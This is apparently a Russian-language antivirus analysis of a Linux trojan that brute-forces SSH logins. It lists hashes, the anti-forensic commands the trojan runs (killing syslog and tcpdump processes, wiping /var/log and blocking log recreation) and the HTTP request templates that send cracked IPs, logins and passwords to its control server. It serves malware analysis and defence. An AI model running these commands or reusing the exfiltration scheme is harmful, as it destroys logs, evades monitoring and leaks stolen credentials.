SHA1:
- c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
- 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)
Троянская программа, угрожающая устройствам под управлением ОС Linux, предназначенная для взлома различных сетевых устройств и компьютеров по протоколу SSH методом грубой силы (брутфорс). После установки и запуска принимает один входной аргумент:
auto:zzz.ccc.vvv.bbbгде zzz.ccc.vvv.bbb - IP-адрес управляющего сервера.
В процессе инициализации троянец удаляет свой рабочий каталог ("/tmp/.../") и очищает правила для iptables. Затем он завершает различные приложения, в том числе программы для ведения и просмотра логов, анализа трафика:
killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`
После этого троянец удаляет существующие файлы журналов по маскам "/var/log/*" и "/disk/*log*". На их месте, с целью предотвращения создания файловых объектов с такими же именами в будущем, создает следующие каталоги:
mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log
Затем троянец получает из /proc/cpuinfo значение частоты процессора, указанное в параметре "bogomips", и на его основе устанавливает количество потоков сканирования и ssh-подключений.
Вслед за этим троянец обращается за получением задания к управляющему серверу, адрес которого он принимает в качестве входного аргумента при запуске. Получаемое троянцем с управляющего сервера задание содержит IP-адрес подсети, которую вредоносная программа сканирует на наличие устройств с открытым SSH-подключением на порту 22. При обнаружении таких устройств троянец пытается получить к ним доступ, перебирая пары логин-пароль по имеющемуся у него словарю, а в случае успеха отправляет сообщение об этом на сервер злоумышленников:
GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent:
Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from
Romania Hello World Microsoft Sucks Bill Gates Must die\n\nгде ip – IP-адрес узла, к которому удалось получить доступ, l - логин, p – пароль.
В отдельном потоке троянец с интервалом в минуту отсылает на управляющий сервер запрос следующего вида:
GET
/auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&s
shspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost:
auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks
Bill Gates Must die\n\nПри этом значение finish равно нулю. После завершения сканирования троянец отправляет 10 аналогичных запросов с интервалом в 1 секунду с параметром finish, равным единице.
Параметр net содержит IP-адрес подсети, которую троянец сканирует в настоящее время.
